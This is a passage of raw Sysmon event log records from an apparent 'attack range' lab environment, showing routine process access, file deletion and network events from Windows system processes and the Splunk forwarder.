11:20:21.142{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.142{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.142{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.142{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.142{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1875-6216-4B07-000000003802}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.142{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1875-6216-4B07-000000003802}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.143{C8EA50B7-1875-6216-4B07-000000003802}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000221995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:17.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51688-false10.0.1.12-8000- 23542300x8000000000000000221997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:22.478{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEA7A9BFCE73E80D6D12C81C104410BB,SHA256=CDB4D8AD18B1526E3F19F16BF0573C75DC74EFE10DCB6DA0D30EDF5546AD3E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:22.173{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90DC583C5D71CC7EDC1CBF5F31598DA1,SHA256=8EDC6F86936E54DEB7158B3D43DCF159B9133FEAD3440984F055BF3D0CB940BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:23.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2945FCEA2BBCCE7E2D0BFC89005C177,SHA256=C2F4224440621BEB0DB3B48C12A98E403535206D1CDF31E8F186F75F71C432D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:23.191{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9E8C4D98D8ADA4E49CE1CC07E52EB8D,SHA256=242AAF0BEE6CDC305A487F5B06B9BBDA2D07573E48C4BCE305585F4377C8AEE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.607{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49509-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:24.649{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28CA3FC3160BBCA2D8FD44074131607C,SHA256=C6A7D05C96248CD02BA4A69EDDBC68B1906B3509874BE90D782182A0ABE93166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:24.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE9D4A4BCBE880535386BA864F1DABBB,SHA256=8A31F372B5C070E6C2D38800846296C08344467CC5D8CE04840C64F8701E10AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:25.759{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C68369A48FF3DA9FC3AD7FC041F90027,SHA256=5E8FD82E1A498000F8206EC775BEA1E675904C7A5C1AD81E7B25DC837C3AECD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:25.259{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5E41D81E1851ACAED271DC6F0A8C49,SHA256=927AAEDE4E4832764C77D5FEE8E1F63712F7C27B9D8B3DA707E839E964C4A420,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:26.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=872F1314D16923744955BC5E477D5EDE,SHA256=A9663DB41468D7C75134A85BE1C41BB8424057BC733EE6113EF88D64AD46FFD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:26.274{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64E6B09CB99AFEB8C0C731DC84B994F5,SHA256=19876F3404719E4B99102036F36991D235BA2654D6B0054A0A5F22C1DBBA7033,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:23.618{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51689-false10.0.1.12-8000- 23542300x8000000000000000298169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:27.323{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450493C8E34E7A822C673C923A07FD49,SHA256=3003E27022F314E695C567964DB7E2C59F390F14F7C3911B30B5E33AD755FEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:28.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D8E36644EA427A1DD95E28D0C44334,SHA256=E0107D40126533EF1BA9765B2B0EEAA062D8AE70464BE2B529FFC0CE54403D71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:28.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87FE5311777D91B113174FFC4755C5C0,SHA256=BF7C79CECB1EBF8147CFF523AB458D04EE5746F6C18FFB468C0C6A6885E47103,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:25.608{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49510-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:29.372{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A81FC71494A172560FFBD7DA5CB0964,SHA256=8BAF465EF805C7ECE855F122DB2B246E922DF69F9A3750F8B1ABDB1E7920C8AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:29.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64568CEBB509B10A5A49505EDF28184A,SHA256=E14463DFC168DB0EDA6E372FB4DBA0656884284C4152F9E651D62707AF2A1D92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:30.373{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51ECA77F8FF043F4B4738F6E0A9FC437,SHA256=DECACDCA6DFA83AEF90FC6ACB63428C7543982563CFF6ADE3C9207722C4CABD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:30.478{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ED05BC61131C539DCD8E76C3B584D111,SHA256=CD0CC1794A5D86A7998652F73038950A5AAD88166DCEF176D525FA71EC19AC83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:30.165{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A72FAD0084182BE818AA3A6E88EEA1C,SHA256=17960EAC880B8396D899DC9A873B997341C4941CC8A55D25B31CE2C0E07C682E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:31.387{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41614D544D3E5B79EA97DE68F992A2F6,SHA256=C9604B5019701E2A96839F965A751A012CF578AEC0F1A197A5DBEC65633D6B6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:31.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA4A697C6D7670E3E92F4C20436B5A9C,SHA256=750AAEBC9D6F4571C373BFEFD22FAFFCD47B9673DAF41396990A5DCDA0C5D7CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:32.388{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC8EB1A2925C2943D706A830E9395D9,SHA256=B83252453E3D22A389AFE0667540F993219A7DF41F4B8865B180E230F1C78205,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:29.665{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51690-false10.0.1.12-8000- 23542300x8000000000000000222008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:32.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73312ECCABFDE67828B7732E6B80EB27,SHA256=F456C0898ADC860A2348FC4144A31E6697E119CA7D2BC5A3D8397F6E30612D57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:33.622{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6474BF0348D676748358754946B37C54,SHA256=236B260D5FD989844ACE2DB4B34202203D150648C27FFF105C1097EA43A1C669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:33.403{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21F32EBBB36818876850845282D5314,SHA256=86C5ACEEC9DD9185A8FDCE4E67325B98AEDA3E29A0E5813CF26D1093401D42A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:33.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12C95384C2D599DD181D0D6F56229612,SHA256=E02AE86F9476E10D3AE8270FFAC5CA215D9D757473F586544A2AF86299F65F15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:34.404{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C3D50C00A13548C1208AA614772464,SHA256=E82212882FBB71F4401FCC98C4D9B5FBCF0F1DA6842B62F2DAFE428B61F7D9E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:34.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7033C030E67DCE8D0CA1C70428FE71A1,SHA256=0F6895AB1EB17A19BA1F4D528F81C95C73E21F2063158A339E75D50CB0F76FE6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:31.622{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49511-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:35.426{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502203454C029B89F90D9F2A6F46AD19,SHA256=E8C742EBBDD86A7308F9B34177AF500FF00D2574DF92F073FC665591AF561717,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:35.259{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1EFD4E27300F0CFF6FA83F74D9CBD32,SHA256=85A6AE04476577517A85A71D72E05081931712B98C00D2BF8F77D29580E5A69F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:36.444{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3196F06E2E6258F4FAE2A3012B46ABF,SHA256=2523B5E79F687A5A0E7B374B19E86AAA3F11FFC6AE57443F596F5939EB9A45B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:36.306{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427E2A5269A6A7ED48944A2BBD704F2C,SHA256=3E00DF30DC3C7819116773C4F39ABA9B0BA6A44460134B07B9D635778569F2F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:37.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 